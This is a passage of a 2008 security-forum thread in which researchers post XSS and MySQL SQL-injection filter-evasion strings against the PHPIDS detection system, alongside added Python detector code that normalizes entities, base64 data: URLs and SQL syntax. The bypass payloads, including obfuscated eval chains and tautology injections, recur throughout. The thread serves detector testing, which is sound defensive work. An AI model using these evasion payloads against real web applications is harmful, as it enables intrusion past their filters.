Current Page: 18 of 31
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: February 07, 2008 03:23AM

That's well right - 'twas too late yesterday evening to remember that :)

But anyway - base64 is still a big problem - unclear to solve. I will do some 'fun experiments' this evening hoping to find a way to deal with those issues. But I am sure there won't be something bulletproof against data URLs since the encoding can be chosen rather arbitrarily: http://h4k.in/dataurl

Greetings,
.mario

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 07, 2008 04:10AM

@mario

You seem to have protected well against data: injection, I tried MANY combinations to defeat the regexps including mixing entities and control characters. So I guess it isn't a problem unless it can be bypassed. I would suggest making data: URLs a higher impact though.

For reference I've found the data: works on Safari, Firefox and Opera.

Please continue your fun experiments :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: christ1an
Date: February 08, 2008 07:49AM

rsnake Wrote:
-------------------------------------------------------
> I'm by no way disparaging your work. I'm only
> saying I think this is the wrong approach.
> Blacklists have been proven to fail for 17 pages.
> Which page do we need to get to before everyone
> agrees? So far everyone is saying it can't be
> done (I agree) - and to me that is the definition
> of the wrong approach, or at minimum the least
> attractive option.
>
> I promise, I'm not trying to stir the pot here,
> I'm honestly concerned that I'm not getting why
> you guys are so gung-ho about a project that is
> unlikely to be bulletproof at serving its primary
> function. What am I missing? Is stopping script
> kiddies enough? If so, I get it - but I thought
> there was a greater goal.

I'm happy you wrote this. Actually, you and some others are missing something here indeed.

I don't need to argue with you or any of you guys about the effectiveness of blacklist approaches. As a matter of fact, blacklists are always buggy - by design. You cannot stop anyone from injecting malicious code with them.

> about a project that is unlikely to be bulletproof at serving its primary function.

So what is the primary function of PHPIDS? As .mario already mentioned, we are not trying to build a webapp shield here at all. We are just trying to detect malicious actions taken on websites. That's all. And that's also why I (not necessarily everyone behind PHPIDS) absolutely agree with you that the last 10 or so pages somehow lost track of our primary objective.

One step back. I consider PHPIDS a very good attack detection system, not only for a few days but for 10 pages. PHPIDS accomplished its aim the moment it required tremendously skilled javascript magicians to be "broken".

Have you ever tried breaking into something by firstly injecting:

s=/x/
$s=.1?'ev':a
$s=.0?.1: $s+'al(loc'
$s=.0?.1: $s+'ation.h'
$s=.0?.1: $s+'ash) '
s.s=''. eval
s.s($s)

... instead of something like '>"><script>alert(1)</script>? I guess not. The point is, PHPIDS will not only detect trivial fragments like '>"><script>alert(1)</script>, which is clearly an XSS attempt, but also a variety of more complicated ones. The latter of course thanks to the last 10 pages; so I'm not saying those were in vain or a waste of time.

PHPIDS is very good at what it was intended to do and it's being improved as we speak. Coming back to blacklists - in this particular case, blacklists are simply a sufficient solution to the problem we faced at the beginning. That's it, absolutely nothing has failed ;)

Regards,
- http://christ1an.blogspot.com

_______________________
php-ids.org (http://php-ids.org) - Web Application Security 2.0

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: February 11, 2008 08:43AM

Hey!

I just added basic detection and translation for nested base64 payload. Gareth - it's on! :)

Greetings,
.mario

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 13, 2008 07:37AM

@mario

I had another quick play with the IDS, it's good :D

However I'd recommend that constructors and prototypes should be blocked, because global functions can reference the current window and also create functions. Take the example below which isn't an exploit of PHPIDS but shows how to create functions through constructors.

x=print.constructor
x=x(/x=alert/[-1])
x()
x(1)

So for example IMO these should be blocked as well:-
print()
moveBy(100,100)
resizeTo(0,0)

etc

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 13, 2008 07:41AM

Here's a trick to get the current window even though it's a XPconnect object:-

x=print.__parent__
x=x['alert']
x(1)

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 13, 2008 08:58AM

Here's a new one :D

You need to click on the links though:-
ale&zwj;rt(1)

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 13, 2008 09:09AM

ale&zwnj;rt(1)
aler&lrm;t(1)
aler&rlm;t(1)

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: February 13, 2008 09:16AM

@Gareth: I absolutely agree and will make those changes ASAP.

&rlm; <- WTF!? Great job - thx!

:)

Greetings,
.mario

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 13, 2008 10:33AM

If I had time I may have been able to turn this into a working XSS hole:-

<table background=&#x00000000000000000000000000000000000000000000000000000000000000000000000000000000006a&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000061&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000076&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000061&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000073&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000063&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000072&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000069&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000070&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000074&#x00000000000000000000000000000000000000000000000000000000000000000000000000000000003a&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000061&#x00000000000000000000000000000000000000000000000000000000000000000000000000000000006c&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000065&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000072&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000074&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000028&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000031&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000029>

Tested in Opera and the injected tag isn't detected in the IDS, possibly could work in IE but I've not tried.

Impact rating of 16,

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: February 13, 2008 10:39AM

Hmmm - I don't know if it makes sense to check on tables - since you can use a lot more elements for background injections. I'd rather propose to check for the background attribute.

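The base64 data: URLs, the zero-width and directional-mark entities, and the zero-padded numeric character references traded in the posts above all defeat a detector that matches the raw input, so an IDS has to normalize before it matches. The following is an added example (not PHPIDS code and not from any poster here) of such a normalizer in Python: it decodes entities with any number of leading zeros, drops Unicode format characters such as ZWJ and RLM, recursively decodes base64 data: URLs so nested payloads surface, and keys the background check on the attribute rather than the element as .mario proposes. A weak decoder capped at 8 hex digits is shown beside it; the sample inputs and signature names are constructed.

```python
import base64
import html
import re
import unicodedata

# Weak decoder of the kind the zero-padded table payload above slips past:
# it accepts at most 8 hex digits per numeric character reference.
def naive_decode(value: str) -> str:
    return re.sub(r"&#x([0-9a-fA-F]{1,8});?",
                  lambda m: chr(int(m.group(1), 16)), value)

B64_DATA_URL = re.compile(r"data:[^,\s'\"<>]*;base64,([A-Za-z0-9+/=]+)", re.I)

def normalize(value: str, depth: int = 0, max_depth: int = 5) -> str:
    """Decode entities (unbounded leading zeros, ';' optional), drop Unicode
    format characters (ZWJ, ZWNJ, LRM, RLM ...) and append the decoded body
    of every base64 data: URL, recursively, so nested payloads surface."""
    text = html.unescape(value)
    text = "".join(ch for ch in text if unicodedata.category(ch) != "Cf")
    if depth >= max_depth:
        return text

    def expand(m):
        b64 = m.group(1)
        try:
            raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
        except ValueError:
            return m.group(0)
        inner = raw.decode("utf-8", "replace")
        return m.group(0) + " " + normalize(inner, depth + 1, max_depth)

    return B64_DATA_URL.sub(expand, text)

# Constructed signature set; a real IDS keys each hit to an impact score.
SIGNATURES = {
    "alert_call": re.compile(r"\balert\s*\(", re.I),
    "background_attr": re.compile(r"\bbackground\s*=", re.I),  # attribute, not element
    "js_scheme": re.compile(r"javascript\s*:", re.I),
    "script_tag": re.compile(r"<\s*script\b", re.I),
}

def detect(value: str) -> list:
    """Names of the signatures that match the normalized input, sorted."""
    norm = normalize(value)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(norm))

# Constructed samples shaped like the posts above.
def padded_entities(text: str, zeros: int = 80) -> str:
    return "".join("&#x" + "0" * zeros + format(ord(c), "02x") for c in text)

SAMPLE_BACKGROUND = "<table background=" + padded_entities("javascript:alert(1)") + ">"
SAMPLE_ZWJ = "ale&zwj;rt(1)"
_inner = base64.b64encode(b"<script>alert(1)</script>").decode()
_mid = f'<iframe src="data:text/html;base64,{_inner}">'
SAMPLE_NESTED = "data:text/html;base64," + base64.b64encode(_mid.encode()).decode()

if __name__ == "__main__":
    for sample in (SAMPLE_BACKGROUND, SAMPLE_ZWJ, SAMPLE_NESTED):
        print(detect(sample))
```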
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 13, 2008 10:40AM

Yeah agreed

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 17, 2008 09:27AM

+alert(1)

Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: February 17, 2008 11:26AM

Fixx0r3d - small bug in the UTF7 converter (even if that explanation sounds weird *g*)

Re: PHPIDS (0.4.7 is close...)
Posted by: thornmaker
Date: February 17, 2008 10:06PM

thanks for the tip Gareth and .mario: http://p42.us/phpids/59.html
ACM=1,1+eval(1+name+(+ACM-1),ACM)

[edit]
I mistakenly thought the above injection was due to an error in the converter dealing with utf-7. I guess not since this injection gets through as well (24 chars): http://p42.us/phpids/60.html
1+eval(1+name+(+1-1),-1)



Edited 3 time(s). Last edit at 02/17/2008 10:20PM by thornmaker.

Re: PHPIDS (0.4.7 is close...)
Posted by: Gareth Heyes
Date: February 18, 2008 02:37AM

@thornmaker

Awesome :D

Re: PHPIDS (0.4.7 is close...)
Posted by: Anonymous User
Date: February 18, 2008 02:59AM

Hehe - nice indeed! I realized that the mb_convert_encoding stuff is to be handled with great care and narrowed the conditions a little bit. Plus the possible UTF7 is now being decoded and attached - not used as a replacement for the whole string. Thx!

I think I will release 0.4.7 tomorrow - any pleas?

Re: PHPIDS (0.4.7 is close...)
Posted by: Reiners
Date: February 18, 2008 03:04PM

1'*column-0-'0 (php-ids)
1'*column-false-'0 (php-ids)
1'*column-0|'0 (php-ids)
1'-column!=-column-'0 (php-ids)
1'-column!=-column|'0 (php-ids)

1'-@a or'1 (php-ids)
a'-@a=@a or'1 (php-ids)

greetings :)

Re: PHPIDS (0.4.7 is close...)
Posted by: thornmaker
Date: February 18, 2008 03:43PM

fun stuff Reiners!

Re: PHPIDS (0.4.7 is close...)
Posted by: Reiners
Date: February 18, 2008 06:47PM

;) yep

the above vector works with different operands of course (aa'^@a or'1 and so on)

edit:
aa'LIKE('aa')|'1 (php-ids)

edit:
aa' *@var or 1 SOUNDS LIKE (1)|'1 (php-ids)
aa' *@var or 1 RLIKE (1)|'1

edit:
a' or~column like ~1|'1 (php-ids)



Edited 7 time(s). Last edit at 02/18/2008 07:41PM by Reiners.

Re: PHPIDS (0.4.7 is close...)
Posted by: Anonymous User
Date: February 19, 2008 03:28PM

Hi Reiners

Nice ones... thx. Fixed!

Greetings,
.mario

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Reiners
Date: February 21, 2008 03:34AM

workarounds for the last fixes ;). remember that MySQL syntax allows as many operands, spaces, brackets and prefixes as you want and where you want.

aa'LIKE('aa')|-'1 http://demo.php-ids.org/?test=aa'LIKE('aa')%7c-'1
a' or ~ column like ~1|(1)#a http://demo.php-ids.org/?test=a'%20or%20~%20column%20like%20~1%7c(1)%23a
aa' * @var or-1 SOUNDS LIKE (1)|-'1 http://demo.php-ids.org/?test=aa'%20*%20@var%20or-1%20SOUNDS%20LIKE%20(1)%7c-'1
aa' * @var or-(1) = -'1 http://demo.php-ids.org/?test=aa'%20*%20@var%20or-(1)%20=%20-'1
1'-@a or-(1)=-'1 http://demo.php-ids.org/?test=1'-@a%20or-(1)=-'1
a' - @a = @a or-(1)=-'1 http://demo.php-ids.org/?test=a'%20-%20@a%20=%20@a%20or-(1)=-'1

1'*column-(0)-'0 http://demo.php-ids.org/?test=1'*column-(0)-'0
1' * column - (false) - '0 http://demo.php-ids.org/?test=1'%20*%20column%20-%20(false)%20-%20'0
1'*column-0|-'0 http://demo.php-ids.org/?test=1'*column-0%7c-'0
1'-column!=-(column)-'0 http://demo.php-ids.org/?test=1'-column!=-(column)-'0
1'-column!=-column|-'0 http://demo.php-ids.org/?test=1'-column!=-column%7c-'0

(they are mainly using all the same little filter bug with a prefix in front of the last number or brackets around another operand)

MfG :)

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: February 21, 2008 05:34AM

@reiners

Very cool! :)

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: fragge
Date: February 21, 2008 08:09PM

As interesting as this topic is, your PHPIDS is 1000% oversensitive. It detects usage of closing bold and italic tags? It raises flags over the use of a perfectly fine hyperlink or image tag, and calls it javascript injections? I thought that this was supposed to allow non-malicious code to operate, whilst filtering malicious code. Blacklisting character sets does not work. Some pretty tricky xss injections tho Gareth :)

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: tx
Date: February 21, 2008 08:15PM

@fragge: PHPIDS isn't supposed to filter anything. It only detects and then assigns it an impact value. Based on that value certain actions can be triggered.

-tx @ lowtech-labs.org

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: fragge
Date: February 21, 2008 09:31PM

So if I pad my document with hundreds of <b><i> and </i></b>, and raise the severity warning, will my document be cancelled? I don't understand the point of this.. it doesn't allow for actual usability.. It just stops any injection.. Which there wouldn't be if we removed the form in the first place - something this thing practically does by blacklisting anything with <> or ' zzz.. using script not only pulls up the "possibly malicious html element" filter, but it also somehow brings up the obfuscation filter as well, despite the obvious fact that no obfuscation has been done. In the hands of a retarded web master, everything will be blocked and their forms will be useless. ._.

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: February 22, 2008 09:24AM

@fragge: The thing is - as tx mentioned correctly: The PHPIDS is not supposed to check on user input where the developer expects or even demands HTML - like from WYSIWYG editors or comparable. It doesn't make sense to monitor such input but just pump it through a well configured HTMLPurifier instance. You can easily exclude those fields by adding them to the include list via Config.ini or dynamically.

The PHPIDS takes care of all the rest - which I believe to be about 99% of all fired requests on a nowadays webapp. The whole system is pretty much designed for very large webapps and it performs well on those.

@Reiners: Nice circumventions ;) Will take care of them asap!

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Reiners
Date: February 23, 2008 01:11PM

hey .mario, new workarounds of the last fixes for you:

aa'LIKE('aa')-'-1 http://demo.php-ids.org/?test=aa'LIKE('aa')-'-1
a' or ~ column like 1|-'1 http://demo.php-ids.org/?test=a'%20or%20~%20column%20like%201%7c-'1
aa' * @var -1 or 1 SOUNDS LIKE (1)|'-1 http://demo.php-ids.org/?test=aa'%20*%20@var%20-1%20or%201%20SOUNDS%20LIKE%20(1)%7c'-1
1'*+column-(0)-'-0 http://demo.php-ids.org/?test=1'*+column-(0)-'-0
1'*+column-(false)-'-0 http://demo.php-ids.org/?test=1'*%2bcolumn-(false)-'-0
1'*+column-0|-'-0 http://demo.php-ids.org/?test=1'*%2bcolumn-0%7c-'-0
1'-column!=-(column)-'-0 http://demo.php-ids.org/?test=1'-column!=-(column)-'-0
1'-column!=-column|-'-0 http://demo.php-ids.org/?test=1'-column!=-column%7c-'-0
1'-id-(@a)or-1='-1 http://demo.php-ids.org/?test=1'-id-(@a)or-1='-1
aa'*(@var)or(-1)='-1 http://demo.php-ids.org/?test=aa'*(@var)or(-1)='-1

most of them use the trick that you can use a prefix in front of the last operand behind the last bracket plus some other prefix/brackets/spaces/operands to pass it around the filters. so it's not really that much new stuff ;)

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: February 23, 2008 01:49PM

Nice ones again - kay, the "\w at the end was pretty senseless ;) Thx!

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Reiners
Date: February 23, 2008 03:27PM

1'*(@a)or(1)LIKE'1 http://demo.php-ids.org/?test=1'*(@a)or(1)LIKE'1
1'*id LIKE(1)+'1 http://demo.php-ids.org/?test=1'*id%20LIKE(1)%2b'1
aa'*@var -1 or 1 SOUNDS LIKE(1)|'+1 http://demo.php-ids.org/?test=aa'*@var%20-1%20or%201%20SOUNDS%20LIKE(1)%7c'%2b1
1'*column+0+ ' +0 http://demo.php-ids.org/?test=1'*column%2b0%2b%20'%20%2b0
1'+column or 1 LIKE '1 http://demo.php-ids.org/?test=1'%2bcolumn%20or%201%20LIKE%20'1
1'-column!=-column%7c- ' -0 http://demo.php-ids.org/?test=1'-column!=-column%7c-%20'%20-0


most of them work with a "+" instead of a "-". The prefix actually doesn't matter, I just tend to try with "-" because "+" is often used in javascript injections and I don't have to url encode it ;). maybe that was confusing. Plus I often used some spaces near the quote.

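Reiners' vectors across the last several posts all share one shape: between a single quote and the next quote (or a trailing comment marker) sits a MySQL expression built from operators, keywords and operands, with brackets, spaces and unary prefixes placed freely, and a prefix in front of the last operand is enough to slip past a rule that anchors on the quote itself. The following added example (Python, not PHPIDS code) detects that shape structurally after normalizing brackets and whitespace, instead of enumerating operator orders; the vectors in the test are the ones from the posts above and the benign strings are constructed.

```python
import re
from urllib.parse import unquote

OPERATORS = set("-+*/|^~!=<>")
KEYWORDS = {"or", "and", "xor", "not", "like", "rlike", "regexp", "sounds",
            "is", "in", "div", "mod", "between"}
TOKEN = re.compile(r"[A-Za-z_@]\w*|\d+|[-+*/|^~!=<>]")
COMMENT = re.compile(r"#|--|/\*")

def normalize_sql(value: str) -> str:
    """URL-decode (%7c, %2b ... as in the demo links), turn brackets into
    whitespace and collapse whitespace runs: MySQL tolerates any amount of
    either, so the detector must not depend on them."""
    text = unquote(value)
    text = re.sub(r"[()]", " ", text)
    return re.sub(r"\s+", " ", text)

def op_or_keyword(tok: str) -> bool:
    return tok in OPERATORS or tok.lower() in KEYWORDS

def looks_like_expression(segment: str, open_ended: bool = False) -> bool:
    """A quote-bounded segment reads as an injected MySQL expression when it
    starts with an operator or keyword, contains at least one operator
    (so a plain quoted 'or' does not count) and ends with an operator or
    keyword, unless a comment terminates the statement (open_ended)."""
    tokens = TOKEN.findall(segment)
    if not tokens or not any(t in OPERATORS for t in tokens):
        return False
    return op_or_keyword(tokens[0]) and (open_ended or op_or_keyword(tokens[-1]))

def breakout_segments(value: str) -> list:
    """Every segment between two single quotes (or between the last quote
    and a comment marker) that looks like an expression; [] when clean."""
    parts = normalize_sql(value).split("'")
    hits = [seg for seg in parts[1:-1] if looks_like_expression(seg)]
    if len(parts) > 1:
        m = COMMENT.search(parts[-1])
        if m and looks_like_expression(parts[-1][:m.start()], open_ended=True):
            hits.append(parts[-1][:m.start()])
    return hits

def is_suspicious(value: str) -> bool:
    return bool(breakout_segments(value))

if __name__ == "__main__":
    # Vectors from the posts above plus one constructed benign string.
    for v in ("1'*column-0-'0", "aa'LIKE('aa')|-'1",
              "a' or ~ column like ~1|(1)#a", "it's 5+3, isn't 'x'"):
        print(is_suspicious(v), breakout_segments(v))
```

A lone quoted operator such as '-' still scores with this rule, which is why an IDS assigns an impact value to each hit rather than blocking outright, as tx points out above.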